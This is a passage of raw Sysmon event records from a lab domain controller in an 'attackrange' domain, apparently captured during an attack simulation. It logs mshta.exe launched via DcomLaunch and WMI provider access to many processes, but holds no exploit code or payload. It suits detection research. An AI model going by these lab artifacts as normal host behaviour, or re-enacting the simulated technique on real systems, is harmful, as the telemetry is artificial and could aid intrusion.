15:59:34.225{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.225{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000026036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.227{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEC:\Windows\System32\mshta.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000026035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-6106-00000000A301}6220C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program 